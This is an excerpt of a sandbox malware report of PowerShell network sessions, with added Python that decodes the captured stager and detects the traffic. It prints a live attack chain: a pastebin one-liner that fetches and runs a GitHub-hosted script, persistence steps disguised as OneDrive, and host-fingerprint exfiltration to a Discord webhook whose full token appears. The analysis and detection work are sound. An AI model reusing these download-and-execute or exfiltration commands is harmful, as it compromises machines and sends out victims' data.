                                                            2024-10-15 15:58:17 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                            2024-10-15 15:58:17 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                            2024-10-15 15:58:17 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W
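
Added example, written for this page and not Joe Sandbox code or the sample's own code: a Python helper that turns the Data Raw hex segments above back into the payloads an analyst actually wants. It reassembles the chunked pastebin.com body (the leading `38 35 0d 0a` is the chunk size 0x85 = 133 bytes, and `30 0d 0a 0d 0a` is the last-chunk), collapses the `("raw.gi"+"thub"+...)` split-string trick into the URL that the following GET requests, and decodes one of the comma-separated decimal fragments from the raw.githubusercontent.com response as UTF-16LE, which is what those byte lists are. Both inputs are copied verbatim from the segments above; the fragment that begins `,0,97,0,108,` decodes to `allit iEx; sal $env:os iWr; calliT(WINDOWS_NT p`, which shows that `calliT` and `WINDOWS_NT` are Set-Alias names for iex and iwr (on Windows `$env:os` is `Windows_NT`, and alias lookup is case-insensitive), so the pastebin one-liner is plain `iex(iwr <url> -usebasicparsing)`. Function names and the alignment heuristic are my own.

```python
import re

# Constructed input: the two "Data Raw" segments of the pastebin.com 200 response
# (session 0 on TCP 443 above), copied from the report exactly as shown there.
PASTEBIN_SEGMENTS = [
    "38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a",
    "30 0d 0a 0d 0a",
]

# Constructed input: one comma-separated fragment of the stage-2 script's byte array
# (a 1378-byte segment of the raw.githubusercontent.com response above). It was cut
# from the middle of the stream, so it starts with the high byte of a previous character.
STAGE2_FRAGMENT = (
    ",0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,"
    "0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,"
    "108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,"
)


def hexdump_to_bytes(segments):
    """Join the space-separated hex of consecutive Data Raw segments into one byte string."""
    return b"".join(bytes.fromhex(seg) for seg in segments)


def dechunk(body):
    """Decode an HTTP/1.1 chunked transfer body (chunk-size CRLF data CRLF ... 0 CRLF CRLF).

    Stops cleanly if the capture is truncated mid-chunk, which sandboxes do for long bodies.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            break  # truncated: no complete chunk-size line left
        field = body[pos:eol].split(b";")[0].strip()  # drop any chunk extension
        if not field:
            break
        size = int(field, 16)
        pos = eol + 2
        if size == 0:
            break  # last-chunk; optional trailer fields follow, not needed here
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk data
    return bytes(out)


def join_string_concat(ps_expr):
    """Collapse the ("a"+"b"+"c") split-string trick into the literal it builds."""
    return "".join(re.findall(r'"([^"]*)"', ps_expr))


def decimal_array_to_text(fragment):
    """Decode a comma-separated decimal byte list as UTF-16LE.

    A fragment cut from the middle of a packet may start with the high byte of the
    previous character; try both alignments and keep the one that is mostly ASCII.
    """
    values = bytes(int(v) for v in fragment.strip(",").split(",") if v.strip())
    best, best_score = "", -1
    for offset in (0, 1):
        chunk = values[offset:]
        if len(chunk) % 2:
            chunk += b"\x00"  # assumption: the missing high byte of the last char is 0
        text = chunk.decode("utf-16-le", errors="replace")
        score = sum(ch.isascii() and ch.isprintable() for ch in text)
        if score > best_score:
            best, best_score = text, score
    return best


def recover_pastebin_stager(segments=PASTEBIN_SEGMENTS):
    """Return (one-liner, reassembled URL) from the pastebin.com response segments."""
    one_liner = dechunk(hexdump_to_bytes(segments)).decode("utf-8")
    return one_liner, join_string_concat(one_liner)


if __name__ == "__main__":
    stager, url = recover_pastebin_stager()
    print(stager)
    print("next stage fetched from:", url)
    print(repr(decimal_array_to_text(STAGE2_FRAGMENT)))
```

The reassembled URL is exactly the Host plus path of the GET that follows in the next session, which is the check that confirms the chain was decoded correctly. Segments of a Content-Length body (the 7508-byte GitHub response) are simply concatenated with `hexdump_to_bytes` and need no dechunking.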


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.8 | 49710 | 162.159.136.232 | 443 | 2944 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 15:58:16 UTC | 333 | OUT | POST /api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Content-Type: application/json
                                                            Host: discord.com
                                                            Content-Length: 216
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:17 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                            2024-10-15 15:58:17 UTC | 216 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 68 75 62 65 72 74 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 61 74 43 41 44 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 5f 5f 5a 43 43 31 39 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                            Data Ascii: { "content": "**user** has joined - atCAD\n----------------------------------\n**GPU:** A__ZCC19\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                            2024-10-15 15:58:17 UTC | 1369 | IN | HTTP/1.1 204 No Content
                                                            Date: Tue, 15 Oct 2024 15:58:17 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            set-cookie: __dcfduid=4acea64c8b0e11ef86bf5ac280988193; Expires=Sun, 14-Oct-2029 15:58:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1729007898
                                                            x-ratelimit-reset-after: 1
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vpYvtJ0khN%2BXcV%2BMT%2FavY1B04I%2FSwkMDFeUDqODH9KbUovZybIBNKhLAqVJhHqR47Wwwebr854FJXkyA4WXWCyimChyR8LlA6WZP1decSV0Thjbgk9CwJgyn%2BhQA"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: __sdcfduid=4acea64c8b0e11ef86bf5ac28098819300713bf47cd6910f3b17cb35f1df607c9f3de4f9c8298101fa3b65b7d48548fc; Expires=Sun, 14-Oct-2029 15:58:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                            Set-Cookie: __cfruid=9befb79772714ec8151410462c0c36f10b8dd4e5-1729007897; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Set-Cookie:
                                                            2024-10-15 15:58:17 UTC | 200 | IN | Data Raw: 20 5f 63 66 75 76 69 64 3d 72 55 56 34 67 39 61 78 4f 67 4b 68 59 67 68 39 6b 6b 61 42 73 69 77 77 73 50 55 42 53 57 51 74 45 6c 4e 77 4a 49 59 52 31 6c 55 2d 31 37 32 39 30 30 37 38 39 37 32 38 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 31 30 32 37 63 37 62 35 32 34 37 61 66 2d 44 46 57 0d 0a 0d 0a
                                                            Data Ascii: _cfuvid=rUV4g9axOgKhYgh9kkaBsiwwsPUBSWQtElNwJIYR1lU-1729007897289-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d31027c7b5247af-DFW
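
Added example (my own detection sketch, not Joe Sandbox's or the sample's code): the sessions above form a compact, reusable pattern: the Windows PowerShell 5.x default User-Agent (`Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/...`) fetching a pastebin.com raw paste, then a raw.githubusercontent.com text file, then a POST to a Discord webhook carrying host fingerprinting data. The Python below tags such requests in a proxy log and flags the chain when a PowerShell-UA stager fetch is followed within two minutes by a PowerShell-UA webhook POST, across PIDs, because in this report the GETs (PIDs 5180 and 2716) and the POST (PID 2944) come from different powershell.exe processes and a per-PID rule would miss it. The pipe-delimited log format, the two-minute window, the path patterns and the benign www.example.com control line are assumptions; the three malicious lines carry the hosts, paths and User-Agent seen in the sessions above.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log modelled on the sessions above, plus one benign browser request
# as a control. Fields: timestamp|pid|method|host|path|user-agent.
SAMPLE_LOG = """\
2024-10-15 15:58:14|5180|GET|pastebin.com|/raw/sA04Mwk2|Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
2024-10-15 15:58:16|5180|GET|raw.githubusercontent.com|/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt|Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
2024-10-15 15:58:16|2944|POST|discord.com|/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8JOliKVAh5eIY85DUg3JNh4|Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
2024-10-15 15:59:02|4120|GET|www.example.com|/|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
"""

# Default User-Agent of Invoke-WebRequest / Invoke-RestMethod in Windows PowerShell 5.x.
POWERSHELL_UA = re.compile(
    r"^Mozilla/5\.0 \(Windows NT; Windows NT [\d.]+; [A-Za-z-]+\) WindowsPowerShell/"
)

# Hosts used to stage scripts (host -> path pattern) and to exfiltrate via webhook.
# The path patterns are assumptions chosen to match what the report shows.
STAGER_SOURCES = {
    "pastebin.com": re.compile(r"^/raw/"),
    "raw.githubusercontent.com": re.compile(r"^/[^/]+/[^/]+/"),
}
WEBHOOK_SINKS = {
    "discord.com": re.compile(r"^/api/webhooks/\d+/"),
}


def parse_log(text):
    """Parse the pipe-delimited sample format into request dicts."""
    requests = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, method, host, path, ua = line.split("|", 5)
        requests.append({
            "ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "pid": int(pid),
            "method": method.upper(),
            "host": host.lower(),
            "path": path,
            "ua": ua,
        })
    return requests


def classify(req):
    """Return the set of detection tags that apply to one request."""
    tags = set()
    if POWERSHELL_UA.match(req["ua"]):
        tags.add("powershell-ua")
    src = STAGER_SOURCES.get(req["host"])
    if req["method"] == "GET" and src and src.match(req["path"]):
        tags.add("stager-source")
    sink = WEBHOOK_SINKS.get(req["host"])
    if req["method"] == "POST" and sink and sink.match(req["path"]):
        tags.add("webhook-exfil")
    return tags


def detect(text, window=timedelta(minutes=2)):
    """Tag each request and flag the staged-download-then-webhook chain.

    The chain fires when a PowerShell-UA GET from a stager source is followed within
    `window` by a PowerShell-UA POST to a webhook sink, regardless of PID.
    """
    findings = [(r["ts"], r["pid"], r["host"], classify(r)) for r in parse_log(text)]
    fetches = [ts for ts, _, _, tags in findings if {"powershell-ua", "stager-source"} <= tags]
    posts = [ts for ts, _, _, tags in findings if {"powershell-ua", "webhook-exfil"} <= tags]
    chain = any(timedelta(0) <= post - fetch <= window for fetch in fetches for post in posts)
    return {"findings": findings, "chain": chain}


if __name__ == "__main__":
    result = detect(SAMPLE_LOG)
    for ts, pid, host, tags in result["findings"]:
        print(ts, pid, host, sorted(tags) or "-")
    print("staged download + webhook chain:", result["chain"])
```

A single `powershell-ua` hit on pastebin.com or raw.githubusercontent.com is already worth an alert in most environments; the chain condition is there to raise severity, and it deliberately ignores PID so that persistence re-launches (the 2716 sessions repeating the same GETs) do not hide the original poster.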


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.8 | 49714 | 104.20.3.235 | 443 | 2716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 15:58:22 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:22 UTC | 396 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 15 Oct 2024 15:58:22 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-frame-options: DENY
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1;mode=block
                                                            cache-control: public, max-age=1801
                                                            CF-Cache-Status: HIT
                                                            Age: 21
                                                            Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 8d31029ccea76b56-DFW
                                                            2024-10-15 15:58:22 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                            2024-10-15 15:58:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.8 | 49716 | 185.199.110.133 | 443 | 2716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-10-15 15:58:23 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            2024-10-15 15:58:23 UTC | 900 | IN | HTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 7508
                                                            Cache-Control: max-age=300
                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                            Content-Type: text/plain; charset=utf-8
                                                            ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-Content-Type-Options: nosniff
                                                            X-Frame-Options: deny
                                                            X-XSS-Protection: 1; mode=block
                                                            X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 15:58:23 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120056-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 1
                                                            X-Timer: S1729007904.670528,VS0,VE1
                                                            Vary: Authorization,Accept-Encoding,Origin
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            X-Fastly-Request-ID: ab08483de387b5c38e36cf00f692e3910916e3f0
                                                            Expires: Tue, 15 Oct 2024 16:03:23 GMT
                                                            Source-Age: 203
                                                            2024-10-15 15:58:23 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
